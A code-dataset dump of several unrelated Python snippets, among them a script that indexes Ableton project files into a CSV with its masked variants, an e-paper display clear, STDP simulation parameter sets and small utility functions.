"step-5": "import warnings\nfrom re import *\n\nfrom pattern import collection\n\nwarnings.filterwarnings(\"ignore\")\n\ndef test():\n raw_text = \"通化辉南县经济适用房_通化辉南县经适房_通化辉南县经济适用房转让_通化去114网通化切换城市var googlequerykey ='二手经适房 二手房买卖 二手房地产公司' ; var AdKeyWords = 'jingshifang';var cityname ='通化' ; var ChildURL = 'ershoufang';不限出售求购不限东昌区二道江区梅河口市集安市通化县辉南县柳河县其他不限一室两室三室四室四室以上不限毛坯简单中档精装豪华不限个人经纪人免费发布二手房信息»\"\n pattern = collection.pattern_test(\"js_var\")\n print(f\"匹配模式为:{pattern}\")\n print(\"----------------------------------------------\")\n #return_text = findall(pattern, raw_text)\n pattern = compile(pattern)\n return_text = sub(pattern, \"替换成功\", raw_text)\n print(return_text)\n\n ''' if(return_text):\n for i, each in enumerate(return_text):\n print(f\"第{i+1}个匹配结果:{each}\")\n else:\n print(\"Not Found pattern-like string!\") '''\n\nif __name__ == \"__main__\":\n test()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import os, sys, datetime, csv, platform
####FUNCTIONS####
#Get Last Modification Time
def get_lastupdate_date(path):
return os.path.getmtime(path)
#Get Date String From Timestamp
def convertIntToTimestamp(timeint):
return str(datetime.datetime.fromtimestamp(timeint))
#Get Filename
def getFilename(name):
return os.path.basename(name)
# Get File Creation Time
def creation_date(path):
"""
Try to get the date that a file was created, falling back to when it was
last modified if that isn't possible.
See http://stackoverflow.com/a/39501288/1709587 for explanation.
"""
if platform.system() == 'Windows':
return os.path.getctime(path)
else:
stat = os.stat(path)
try:
return stat.st_birthtime
except AttributeError:
# We're probably on Linux. No easy way to get creation dates here,
# so we'll settle for when its content was last modified.
return stat.st_mtime
#Print List
def print_list(x):
for i in range(0,len(x)):
print(x[i])
return x
#Listing Files
def fileList(source, filetype='.als'):
matches = []
for root, dirnames, filenames in os.walk(source):
for filename in filenames:
if filename.endswith((filetype)):
matches.append(os.path.join(root, filename))
return matches
def mylistdir(directory):
"""A specialized version of os.listdir() that ignores files that
start with a leading period."""
filelist = os.listdir(directory)
return [x for x in filelist
if not (x.startswith('.'))]
def collectElements(dir):
## collecting elements into a list
    for filename in dir:
        if filename.endswith(".als"):
            thefiles.append(filename)
    return thefiles
## INPUTDIRECTORIES
subpath = []
subdirs = []
thefiles = []
thelist = []
## Examples of Directories
#/Users/blakenicholson/Documents/Personal/Projects/Music Production/Ableton Projects
#/Volumes/Samsung_T3/Old Ableton Projects/1.RELEASED/Neuromansah - DumbBlake Project
filePath = r"/Users/blakenicholson/Dropbox/Ableton Projects"
#filePath = raw_input('File path would you like to use: ')
dirs = mylistdir(filePath)
print(dirs)
print(collectElements(dirs))
#Writes contents of filePath to a txt file
file = open("testtext.txt","w+")
for item in fileList(filePath):
file.write(os.path.basename(item) +", "+convertIntToTimestamp(get_lastupdate_date(item))+", "+convertIntToTimestamp(creation_date(item))+", "+os.path.abspath(item)+"\n")
file.close()
#convert txt -> csv
with open('testcsv.csv', 'w+') as fp:
a = csv.writer(fp, delimiter=',')
a.writerow(['File Name','Updated Date','Created Date','Path'])
for item in fileList(filePath):
a.writerow([ os.path.basename(item) , convertIntToTimestamp(get_lastupdate_date(item)), convertIntToTimestamp(creation_date(item)), os.path.abspath(item)])
|
normal
|
{
"blob_id": "e83b6b1f4cb12fe3b932903eddddfb0dc0e7d98d",
"index": 2765,
"step-1": "<mask token>\n\n\ndef get_lastupdate_date(path):\n return os.path.getmtime(path)\n\n\ndef convertIntToTimestamp(timeint):\n return str(datetime.datetime.fromtimestamp(timeint))\n\n\ndef getFilename(name):\n return os.path.basename(name)\n\n\ndef creation_date(path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n \"\"\"\n if platform.system() == 'Windows':\n return os.path.getctime(path)\n else:\n stat = os.stat(path)\n try:\n return stat.st_birthtime\n except AttributeError:\n return stat.st_mtime\n\n\n<mask token>\n\n\ndef mylistdir(directory):\n \"\"\"A specialized version of os.listdir() that ignores files that\n start with a leading period.\"\"\"\n filelist = os.listdir(directory)\n return [x for x in filelist if not x.startswith('.')]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_lastupdate_date(path):\n return os.path.getmtime(path)\n\n\ndef convertIntToTimestamp(timeint):\n return str(datetime.datetime.fromtimestamp(timeint))\n\n\ndef getFilename(name):\n return os.path.basename(name)\n\n\ndef creation_date(path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n \"\"\"\n if platform.system() == 'Windows':\n return os.path.getctime(path)\n else:\n stat = os.stat(path)\n try:\n return stat.st_birthtime\n except AttributeError:\n return stat.st_mtime\n\n\ndef print_list(x):\n for i in range(0, len(x)):\n print(x[i])\n return x\n\n\ndef fileList(source, filetype='.als'):\n matches = []\n for root, dirnames, filenames in os.walk(source):\n for filename in filenames:\n if filename.endswith(filetype):\n matches.append(os.path.join(root, filename))\n return matches\n\n\ndef mylistdir(directory):\n \"\"\"A specialized version of os.listdir() that ignores files that\n start with a leading period.\"\"\"\n filelist = os.listdir(directory)\n return [x for x in filelist if not x.startswith('.')]\n\n\ndef collectElements(dir):\n for directory in dir:\n for filename in directory:\n if filename.endswith('.als'):\n thefiles.append(filename)\n return thefiles\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_lastupdate_date(path):\n return os.path.getmtime(path)\n\n\ndef convertIntToTimestamp(timeint):\n return str(datetime.datetime.fromtimestamp(timeint))\n\n\ndef getFilename(name):\n return os.path.basename(name)\n\n\ndef creation_date(path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n \"\"\"\n if platform.system() == 'Windows':\n return os.path.getctime(path)\n else:\n stat = os.stat(path)\n try:\n return stat.st_birthtime\n except AttributeError:\n return stat.st_mtime\n\n\ndef print_list(x):\n for i in range(0, len(x)):\n print(x[i])\n return x\n\n\ndef fileList(source, filetype='.als'):\n matches = []\n for root, dirnames, filenames in os.walk(source):\n for filename in filenames:\n if filename.endswith(filetype):\n matches.append(os.path.join(root, filename))\n return matches\n\n\ndef mylistdir(directory):\n \"\"\"A specialized version of os.listdir() that ignores files that\n start with a leading period.\"\"\"\n filelist = os.listdir(directory)\n return [x for x in filelist if not x.startswith('.')]\n\n\ndef collectElements(dir):\n for directory in dir:\n for filename in directory:\n if filename.endswith('.als'):\n thefiles.append(filename)\n return thefiles\n\n\n<mask token>\nprint(dirs)\nprint(collectElements(dirs))\n<mask token>\nfor item in fileList(filePath):\n file.write(os.path.basename(item) + ', ' + convertIntToTimestamp(\n get_lastupdate_date(item)) + ', ' + convertIntToTimestamp(\n creation_date(item)) + ', ' + os.path.abspath(item) + '\\n')\nfile.close\nwith open('testcsv.csv', 'w+') as fp:\n a = csv.writer(fp, delimiter=',')\n a.writerow(['File Name', 'Updated Date', 'Created Date', 'Path'])\n for item in fileList(filePath):\n a.writerow([os.path.basename(item), convertIntToTimestamp(\n get_lastupdate_date(item)), convertIntToTimestamp(creation_date\n (item)), os.path.abspath(item)])\n",
"step-4": "import os, sys, datetime, csv, platform\n\n\ndef get_lastupdate_date(path):\n return os.path.getmtime(path)\n\n\ndef convertIntToTimestamp(timeint):\n return str(datetime.datetime.fromtimestamp(timeint))\n\n\ndef getFilename(name):\n return os.path.basename(name)\n\n\ndef creation_date(path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n \"\"\"\n if platform.system() == 'Windows':\n return os.path.getctime(path)\n else:\n stat = os.stat(path)\n try:\n return stat.st_birthtime\n except AttributeError:\n return stat.st_mtime\n\n\ndef print_list(x):\n for i in range(0, len(x)):\n print(x[i])\n return x\n\n\ndef fileList(source, filetype='.als'):\n matches = []\n for root, dirnames, filenames in os.walk(source):\n for filename in filenames:\n if filename.endswith(filetype):\n matches.append(os.path.join(root, filename))\n return matches\n\n\ndef mylistdir(directory):\n \"\"\"A specialized version of os.listdir() that ignores files that\n start with a leading period.\"\"\"\n filelist = os.listdir(directory)\n return [x for x in filelist if not x.startswith('.')]\n\n\ndef collectElements(dir):\n for directory in dir:\n for filename in directory:\n if filename.endswith('.als'):\n thefiles.append(filename)\n return thefiles\n\n\nsubpath = []\nsubdirs = []\nthefiles = []\nthelist = []\nfilePath = '/Users/blakenicholson/Dropbox/Ableton Projects'\ndirs = mylistdir(filePath)\nprint(dirs)\nprint(collectElements(dirs))\nfile = open('testtext.txt', 'w+')\nfor item in fileList(filePath):\n file.write(os.path.basename(item) + ', ' + convertIntToTimestamp(\n get_lastupdate_date(item)) + ', ' + convertIntToTimestamp(\n creation_date(item)) + ', ' + os.path.abspath(item) + '\\n')\nfile.close\nwith open('testcsv.csv', 'w+') as fp:\n a = csv.writer(fp, delimiter=',')\n a.writerow(['File Name', 'Updated Date', 'Created Date', 'Path'])\n for item in fileList(filePath):\n a.writerow([os.path.basename(item), convertIntToTimestamp(\n get_lastupdate_date(item)), convertIntToTimestamp(creation_date\n (item)), os.path.abspath(item)])\n",
"step-5": "import os, sys, datetime, csv, platform\n\n####FUNCTIONS####\n\n#Get Creation Time\ndef get_lastupdate_date(path):\n return os.path.getmtime(path)\n \n#Get Date From String\ndef convertIntToTimestamp(timeint):\n return str(datetime.datetime.fromtimestamp(timeint))\n\n#Get Filename\ndef getFilename(name):\n return os.path.basename(name)\n\n# Get File Creation Time\ndef creation_date(path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n \"\"\"\n if platform.system() == 'Windows':\n return os.path.getctime(path)\n else:\n stat = os.stat(path)\n try:\n return stat.st_birthtime\n except AttributeError:\n # We're probably on Linux. No easy way to get creation dates here,\n # so we'll settle for when its content was last modified.\n return stat.st_mtime\n\n#Print List\ndef print_list(x):\n\tfor i in range(0,len(x)):\n\t\tprint(x[i])\n\treturn x\n\n#Listing Files\ndef fileList(source, filetype='.als'):\n matches = []\n for root, dirnames, filenames in os.walk(source):\n for filename in filenames:\n if filename.endswith((filetype)):\n matches.append(os.path.join(root, filename))\n return matches\n\t\ndef mylistdir(directory):\n \"\"\"A specialized version of os.listdir() that ignores files that\n start with a leading period.\"\"\"\n filelist = os.listdir(directory)\n return [x for x in filelist\n if not (x.startswith('.'))]\n\ndef collectElements(dir):\n ## collecting elements into a list\n for directory in dir:\n for filename in directory:\n if filename.endswith(\".als\"):\n thefiles.append(filename) \n return thefiles\n\n\n## INPUTDIRECTORIES\nsubpath = []\nsubdirs = []\nthefiles = []\nthelist = []\n\n## Examples of Directories\n#/Users/blakenicholson/Documents/Personal/Projects/Music Production/Ableton Projects\n#/Volumes/Samsung_T3/Old Ableton Projects/1.RELEASED/Neuromansah - DumbBlake Project\n\nfilePath = r\"/Users/blakenicholson/Dropbox/Ableton Projects\"\n#filePath = raw_input('File path would you like to use: ')\ndirs = mylistdir(filePath)\nprint(dirs)\n\n\nprint(collectElements(dirs))\n\n#Writes contents of filePath to a txt file\nfile = open(\"testtext.txt\",\"w+\")\nfor item in fileList(filePath):\n file.write(os.path.basename(item) +\", \"+convertIntToTimestamp(get_lastupdate_date(item))+\", \"+convertIntToTimestamp(creation_date(item))+\", \"+os.path.abspath(item)+\"\\n\") \nfile.close\n\n#convert txt -> csv\nwith open('testcsv.csv', 'w+') as fp:\n a = csv.writer(fp, delimiter=',')\n a.writerow(['File Name','Updated Date','Created Date','Path'])\n for item in fileList(filePath):\n a.writerow([ os.path.basename(item) , convertIntToTimestamp(get_lastupdate_date(item)), convertIntToTimestamp(creation_date(item)), os.path.abspath(item)])\n ",
"step-ids": [
5,
8,
9,
11,
12
]
}
|
[
5,
8,
9,
11,
12
] |
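The record above walks a directory tree, collects .als project files, and exports name / modified / created / path columns to CSV; the sketch below shows a more compact variant of that export step using pathlib. It is illustrative only: the function name and output filename are assumptions, and it targets Python 3.

# Illustrative pathlib variant of the CSV export above (not part of the original script).
import csv
import datetime
from pathlib import Path

def export_file_index(root, out_csv='file_index.csv', suffix='.als'):
    with open(out_csv, 'w', newline='') as fp:
        writer = csv.writer(fp)
        writer.writerow(['File Name', 'Updated Date', 'Created Date', 'Path'])
        for p in Path(root).rglob('*' + suffix):
            stat = p.stat()
            created = getattr(stat, 'st_birthtime', stat.st_mtime)  # fall back to mtime where birth time is unavailable
            writer.writerow([p.name,
                             datetime.datetime.fromtimestamp(stat.st_mtime),
                             datetime.datetime.fromtimestamp(created),
                             str(p.resolve())])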
#!/usr/bin/python
# -*- coding:utf-8 -*-
import epd2in7
import time
from PIL import Image,ImageDraw,ImageFont
import traceback
try:
epd = epd2in7.EPD()
epd.init()
epd.Clear(0xFF)
time.sleep(2)
epd.sleep()
except:
    print('traceback.format_exc():\n%s' % traceback.format_exc())
exit()
|
normal
|
{
"blob_id": "14cac4f11830511923ee1ce0d49ec579aec016fd",
"index": 4720,
"step-1": "#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport epd2in7\nimport time\nfrom PIL import Image,ImageDraw,ImageFont\nimport traceback\n\ntry:\n epd = epd2in7.EPD()\n epd.init()\n epd.Clear(0xFF)\n \n time.sleep(2)\n \n epd.sleep()\n \nexcept:\n print 'traceback.format_exc():\\n%s' % traceback.format_exc()\n exit()\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# print all cards with even numbers.
cards = ["2", "3", "4", "5", "6", "7", "8", "9", "10", "J", "Q", "K", "A"]
for card in cards:
try:
number = int(card)
if number % 2 == 0: # modulo operator
print(card, "is an even card.")
except ValueError:
print (card, "can not be divided")
|
normal
|
{
"blob_id": "b5180a2dbe1f12e1bbc92874c67ea99c9a84a9ed",
"index": 19,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor card in cards:\n try:\n number = int(card)\n if number % 2 == 0:\n print(card, 'is an even card.')\n except ValueError:\n print(card, 'can not be divided')\n",
"step-3": "cards = ['2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K', 'A']\nfor card in cards:\n try:\n number = int(card)\n if number % 2 == 0:\n print(card, 'is an even card.')\n except ValueError:\n print(card, 'can not be divided')\n",
"step-4": "\n# print all cards with even numbers.\n\ncards = [\"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"J\", \"Q\", \"K\", \"A\"]\n\nfor card in cards:\n try:\n number = int(card)\n if number % 2 == 0: # modulo operator\n print(card, \"is an even card.\")\n except ValueError:\n print (card, \"can not be divided\")\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
### Global parameters ###
seconds_per_unit_time = 0.01
#########################
pars_spont = {
"tau_p": 2.5,
"tau_d": 5.0,
"amp_p": 0.08,
"amp_d": -0.0533,
"rho": 0.0015,
"N": 50,
"w_max": 0.05,
"mu": 0.07,
"seed": None,
"tend": 50_000_000,
"r_in": 0.04,
"w_in": 0.05,
"init_W": "random",
"init_scale": 0.2,
}
pars_avg_dw = {
"tau_p": 2.5,
"tau_d": 5.0,
"amp_p": 0.08,
"amp_d": -0.0533,
"rho": 0.0015,
"N": 50,
"w_max": 0.05,
"mu": 0.07,
"seed": None,
"tend": 50_000_000,
"init_W": None,
}
pars_learn = {
"tau_p": 3.5,
"tau_d": 5.0,
"amp_p": 0.08,
"amp_d": -0.065,
"rho": 0.0015,
"rho_ext": 0.0418,
"N": 81,
"w_max": 0.026,
"w_ext": 0.26,
"mu": 0.07,
"seed": None,
"assembly_size": 20,
"inputs": 1,
"t_ON": 18_000,
"t_OFF": 10_000_000,
"init_W": "random",
"init_scale": 0.1,
}
pars_drift = {
"tau_p": 2.5,
"tau_d": 5.0,
"amp_p": 0.08,
"amp_d": -0.0533,
"rho": 0.002,
"N": 72,
"w_max": 0.056,
"mu": 0.148,
"seed": None,
"T1": 50_000_000,
"T2": 50_000_000,
"init_W": "random",
"init_scale": 0.25,
}
pars_drift2 = {
"tau_p": 2.5,
"tau_d": 5.0,
"amp_p": 0.08,
"amp_d": -0.0533,
"rho": 0.0015,
"rho_small": 0.0003,
"N": 120,
"w_max": 0.024,
"mu": 0.05,
"seed": None,
"t_switch": 30_000_000,
"p_switch": 0.03,
"init_W": "assemblies",
"num_assemblies": 6,
"assembly_size": 20,
}
pars_sizes = {
"tau_p": 2.5,
"tau_d": 5.0,
"amp_p": 0.08,
"amp_d": -0.0533,
"rho": 0.0015,
"N": 150,
"mu": 0.04,
"seed": None,
"tend": 150_000_000,
"init_W": "random",
"init_scale": 0.2,
}
pars_intertwined = {
"seconds_per_unit_time": 0.01,
"tau_p": 2.6,
"tau_d": 6.5,
"amp_p": 0.08,
"amp_d": -0.042,
"rho": 0.0015,
"w_max": 0.018,
"N": 190,
"num_assemblies": 20,
"swaps": 0,
"mu": 0.017,
"seed": None,
"t_eq": 20_000_000,
"n_sims": 900,
"t_sim": 100_000,
"init_W": "intertwined",
}
pars_avg_dw = {
"tau_p": 2.5,
"tau_d": 5.0,
"amp_p": 0.08,
"amp_d": -0.0533,
"rho": 0.0015,
"N": 50,
"w_max": 0.05,
"mu": 0.07,
"seed": None,
"tend": 50_000_000,
"init_W": None,
}
pars_overlap = {
"tau_p": 2.5,
"tau_d": 5.0,
"amp_p": 0.08,
"amp_d": -0.0533,
"rho": 0.0015,
"rho_small": 0.0001,
"N": 60,
"w_max": 0.024,
"mu": 0.045,
"seed": None,
"t_end": 100_000_000,
"init_W": "assemblies",
"num_assemblies": 3,
"assembly_size": 20,
}
pars_sparse = {
"tau_p": 2.5,
"tau_d": 5.0,
"amp_p": 0.08,
"amp_d": -0.0533,
"rho": 0.0015,
"N": 50,
"w_max": 0.05,
"mu": 0.07,
"seed": None,
"tend": 20_000_000,
"init_W": None,
"density": 0.8,
}
pars_input_strength = {
"tau_p": 3.5,
"tau_d": 5.0,
"amp_p": 0.08,
"amp_d": -0.066,
"rho": 0.0015,
"N": 50,
"N_target": 20,
"w_max": 0.026,
"mu": 0.01,
"seed": None,
"r_in": 0.04,
"w_in": 0.05,
"init_W": None,
}
|
normal
|
{
"blob_id": "8f17c1ed0cb273a88b986cd7fe7a45439211d536",
"index": 8641,
"step-1": "<mask token>\n",
"step-2": "seconds_per_unit_time = 0.01\npars_spont = {'tau_p': 2.5, 'tau_d': 5.0, 'amp_p': 0.08, 'amp_d': -0.0533,\n 'rho': 0.0015, 'N': 50, 'w_max': 0.05, 'mu': 0.07, 'seed': None, 'tend':\n 50000000, 'r_in': 0.04, 'w_in': 0.05, 'init_W': 'random', 'init_scale': 0.2\n }\npars_avg_dw = {'tau_p': 2.5, 'tau_d': 5.0, 'amp_p': 0.08, 'amp_d': -0.0533,\n 'rho': 0.0015, 'N': 50, 'w_max': 0.05, 'mu': 0.07, 'seed': None, 'tend':\n 50000000, 'init_W': None}\npars_learn = {'tau_p': 3.5, 'tau_d': 5.0, 'amp_p': 0.08, 'amp_d': -0.065,\n 'rho': 0.0015, 'rho_ext': 0.0418, 'N': 81, 'w_max': 0.026, 'w_ext': \n 0.26, 'mu': 0.07, 'seed': None, 'assembly_size': 20, 'inputs': 1,\n 't_ON': 18000, 't_OFF': 10000000, 'init_W': 'random', 'init_scale': 0.1}\npars_drift = {'tau_p': 2.5, 'tau_d': 5.0, 'amp_p': 0.08, 'amp_d': -0.0533,\n 'rho': 0.002, 'N': 72, 'w_max': 0.056, 'mu': 0.148, 'seed': None, 'T1':\n 50000000, 'T2': 50000000, 'init_W': 'random', 'init_scale': 0.25}\npars_drift2 = {'tau_p': 2.5, 'tau_d': 5.0, 'amp_p': 0.08, 'amp_d': -0.0533,\n 'rho': 0.0015, 'rho_small': 0.0003, 'N': 120, 'w_max': 0.024, 'mu': \n 0.05, 'seed': None, 't_switch': 30000000, 'p_switch': 0.03, 'init_W':\n 'assemblies', 'num_assemblies': 6, 'assembly_size': 20}\npars_sizes = {'tau_p': 2.5, 'tau_d': 5.0, 'amp_p': 0.08, 'amp_d': -0.0533,\n 'rho': 0.0015, 'N': 150, 'mu': 0.04, 'seed': None, 'tend': 150000000,\n 'init_W': 'random', 'init_scale': 0.2}\npars_intertwined = {'seconds_per_unit_time': 0.01, 'tau_p': 2.6, 'tau_d': \n 6.5, 'amp_p': 0.08, 'amp_d': -0.042, 'rho': 0.0015, 'w_max': 0.018, 'N':\n 190, 'num_assemblies': 20, 'swaps': 0, 'mu': 0.017, 'seed': None,\n 't_eq': 20000000, 'n_sims': 900, 't_sim': 100000, 'init_W': 'intertwined'}\npars_avg_dw = {'tau_p': 2.5, 'tau_d': 5.0, 'amp_p': 0.08, 'amp_d': -0.0533,\n 'rho': 0.0015, 'N': 50, 'w_max': 0.05, 'mu': 0.07, 'seed': None, 'tend':\n 50000000, 'init_W': None}\npars_overlap = {'tau_p': 2.5, 'tau_d': 5.0, 'amp_p': 0.08, 'amp_d': -0.0533,\n 'rho': 0.0015, 'rho_small': 0.0001, 'N': 60, 'w_max': 0.024, 'mu': \n 0.045, 'seed': None, 't_end': 100000000, 'init_W': 'assemblies',\n 'num_assemblies': 3, 'assembly_size': 20}\npars_sparse = {'tau_p': 2.5, 'tau_d': 5.0, 'amp_p': 0.08, 'amp_d': -0.0533,\n 'rho': 0.0015, 'N': 50, 'w_max': 0.05, 'mu': 0.07, 'seed': None, 'tend':\n 20000000, 'init_W': None, 'density': 0.8}\npars_input_strength = {'tau_p': 3.5, 'tau_d': 5.0, 'amp_p': 0.08, 'amp_d': \n -0.066, 'rho': 0.0015, 'N': 50, 'N_target': 20, 'w_max': 0.026, 'mu': \n 0.01, 'seed': None, 'r_in': 0.04, 'w_in': 0.05, 'init_W': None}\n",
"step-3": "### Global parameters ###\n\nseconds_per_unit_time = 0.01\n\n#########################\n\npars_spont = {\n \"tau_p\": 2.5,\n \"tau_d\": 5.0,\n \"amp_p\": 0.08,\n \"amp_d\": -0.0533,\n \"rho\": 0.0015,\n \"N\": 50,\n \"w_max\": 0.05,\n \"mu\": 0.07,\n \"seed\": None,\n \"tend\": 50_000_000,\n \"r_in\": 0.04,\n \"w_in\": 0.05,\n \"init_W\": \"random\",\n \"init_scale\": 0.2,\n}\n\npars_avg_dw = {\n \"tau_p\": 2.5,\n \"tau_d\": 5.0,\n \"amp_p\": 0.08,\n \"amp_d\": -0.0533,\n \"rho\": 0.0015,\n \"N\": 50,\n \"w_max\": 0.05,\n \"mu\": 0.07,\n \"seed\": None,\n \"tend\": 50_000_000,\n \"init_W\": None,\n}\n\npars_learn = {\n \"tau_p\": 3.5,\n \"tau_d\": 5.0,\n \"amp_p\": 0.08,\n \"amp_d\": -0.065,\n \"rho\": 0.0015,\n \"rho_ext\": 0.0418,\n \"N\": 81,\n \"w_max\": 0.026,\n \"w_ext\": 0.26,\n \"mu\": 0.07,\n \"seed\": None,\n \"assembly_size\": 20,\n \"inputs\": 1,\n \"t_ON\": 18_000,\n \"t_OFF\": 10_000_000,\n \"init_W\": \"random\",\n \"init_scale\": 0.1,\n}\n\n\npars_drift = {\n \"tau_p\": 2.5,\n \"tau_d\": 5.0,\n \"amp_p\": 0.08,\n \"amp_d\": -0.0533,\n \"rho\": 0.002,\n \"N\": 72,\n \"w_max\": 0.056,\n \"mu\": 0.148,\n \"seed\": None,\n \"T1\": 50_000_000,\n \"T2\": 50_000_000,\n \"init_W\": \"random\",\n \"init_scale\": 0.25,\n}\n\n\npars_drift2 = {\n \"tau_p\": 2.5,\n \"tau_d\": 5.0,\n \"amp_p\": 0.08,\n \"amp_d\": -0.0533,\n \"rho\": 0.0015,\n \"rho_small\": 0.0003,\n \"N\": 120,\n \"w_max\": 0.024,\n \"mu\": 0.05,\n \"seed\": None,\n \"t_switch\": 30_000_000,\n \"p_switch\": 0.03,\n \"init_W\": \"assemblies\",\n \"num_assemblies\": 6,\n \"assembly_size\": 20,\n}\n\npars_sizes = {\n \"tau_p\": 2.5,\n \"tau_d\": 5.0,\n \"amp_p\": 0.08,\n \"amp_d\": -0.0533,\n \"rho\": 0.0015,\n \"N\": 150,\n \"mu\": 0.04,\n \"seed\": None,\n \"tend\": 150_000_000,\n \"init_W\": \"random\",\n \"init_scale\": 0.2,\n}\n\n\npars_intertwined = {\n \"seconds_per_unit_time\": 0.01,\n \"tau_p\": 2.6,\n \"tau_d\": 6.5,\n \"amp_p\": 0.08,\n \"amp_d\": -0.042,\n \"rho\": 0.0015,\n \"w_max\": 0.018,\n \"N\": 190,\n \"num_assemblies\": 20,\n \"swaps\": 0,\n \"mu\": 0.017,\n \"seed\": None,\n \"t_eq\": 20_000_000,\n \"n_sims\": 900,\n \"t_sim\": 100_000,\n \"init_W\": \"intertwined\",\n}\n\npars_avg_dw = {\n \"tau_p\": 2.5,\n \"tau_d\": 5.0,\n \"amp_p\": 0.08,\n \"amp_d\": -0.0533,\n \"rho\": 0.0015,\n \"N\": 50,\n \"w_max\": 0.05,\n \"mu\": 0.07,\n \"seed\": None,\n \"tend\": 50_000_000,\n \"init_W\": None,\n}\n\npars_overlap = {\n \"tau_p\": 2.5,\n \"tau_d\": 5.0,\n \"amp_p\": 0.08,\n \"amp_d\": -0.0533,\n \"rho\": 0.0015,\n \"rho_small\": 0.0001,\n \"N\": 60,\n \"w_max\": 0.024,\n \"mu\": 0.045,\n \"seed\": None,\n \"t_end\": 100_000_000,\n \"init_W\": \"assemblies\",\n \"num_assemblies\": 3,\n \"assembly_size\": 20,\n}\n\n\npars_sparse = {\n \"tau_p\": 2.5,\n \"tau_d\": 5.0,\n \"amp_p\": 0.08,\n \"amp_d\": -0.0533,\n \"rho\": 0.0015,\n \"N\": 50,\n \"w_max\": 0.05,\n \"mu\": 0.07,\n \"seed\": None,\n \"tend\": 20_000_000,\n \"init_W\": None,\n \"density\": 0.8,\n}\n\npars_input_strength = {\n \"tau_p\": 3.5,\n \"tau_d\": 5.0,\n \"amp_p\": 0.08,\n \"amp_d\": -0.066,\n \"rho\": 0.0015,\n \"N\": 50,\n \"N_target\": 20,\n \"w_max\": 0.026,\n \"mu\": 0.01,\n \"seed\": None,\n \"r_in\": 0.04,\n \"w_in\": 0.05,\n \"init_W\": None,\n}\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
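One quick consistency check for STDP parameter sets like those above is to compare the areas under the potentiation and depression branches of an exponential pair-based kernel (amplitude times time constant); the snippet below is an illustrative calculation on pars_spont, not part of the original parameter file, and the exponential-kernel assumption is mine.

# Illustrative kernel-balance check (assumes exponential STDP windows).
p = pars_spont
potentiation_area = p['amp_p'] * p['tau_p']   # 0.08 * 2.5   =  0.20
depression_area = p['amp_d'] * p['tau_d']     # -0.0533 * 5.0 = -0.2665
print(potentiation_area + depression_area)    # negative: depression dominates for uncorrelated spiking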
from functions.service_funcs.get_data import get_data_character
def clean_room(update):
char, db_sess = get_data_character(update, return_sess=True)
    # delete the old room and everything associated with it
if char and char.room:
if char.room.mobs:
for mob in char.room.mobs:
db_sess.delete(mob)
if char.room.items:
for item in char.room.items:
db_sess.delete(item)
db_sess.delete(char.room)
db_sess.commit()
|
normal
|
{
"blob_id": "4d57fa22282d7b3f8adabedd7a04e32767181890",
"index": 5693,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef clean_room(update):\n char, db_sess = get_data_character(update, return_sess=True)\n if char and char.room:\n if char.room.mobs:\n for mob in char.room.mobs:\n db_sess.delete(mob)\n if char.room.items:\n for item in char.room.items:\n db_sess.delete(item)\n db_sess.delete(char.room)\n db_sess.commit()\n",
"step-3": "from functions.service_funcs.get_data import get_data_character\n\n\ndef clean_room(update):\n char, db_sess = get_data_character(update, return_sess=True)\n if char and char.room:\n if char.room.mobs:\n for mob in char.room.mobs:\n db_sess.delete(mob)\n if char.room.items:\n for item in char.room.items:\n db_sess.delete(item)\n db_sess.delete(char.room)\n db_sess.commit()\n",
"step-4": "from functions.service_funcs.get_data import get_data_character\n\n\ndef clean_room(update):\n char, db_sess = get_data_character(update, return_sess=True)\n # удаляем старую комнату и всю инфу о ней\n if char and char.room:\n if char.room.mobs:\n for mob in char.room.mobs:\n db_sess.delete(mob)\n if char.room.items:\n for item in char.room.items:\n db_sess.delete(item)\n db_sess.delete(char.room)\n db_sess.commit()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from .Buzzer import BuzzerController
from .Card import CardScanner
from .RFID import RFIDController
from .Servo import ServoController
__all__ = ["BuzzerController", "CardScanner", "RFIDController", "ServoController"]
|
normal
|
{
"blob_id": "8fa78824a38a3b0c1f51aceacab671f987ea2705",
"index": 9635,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n__all__ = ['BuzzerController', 'CardScanner', 'RFIDController',\n 'ServoController']\n",
"step-3": "from .Buzzer import BuzzerController\nfrom .Card import CardScanner\nfrom .RFID import RFIDController\nfrom .Servo import ServoController\n__all__ = ['BuzzerController', 'CardScanner', 'RFIDController',\n 'ServoController']\n",
"step-4": "from .Buzzer import BuzzerController\nfrom .Card import CardScanner\nfrom .RFID import RFIDController\nfrom .Servo import ServoController\n\n__all__ = [\"BuzzerController\", \"CardScanner\", \"RFIDController\", \"ServoController\"]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from __future__ import division
import random as rnd
import math
from collections import Counter
from matplotlib import pyplot as plt
import ds_library
import ds_algebra
import ds_probability
import ds_gradient_descent
def normal_pdfs_visualization():
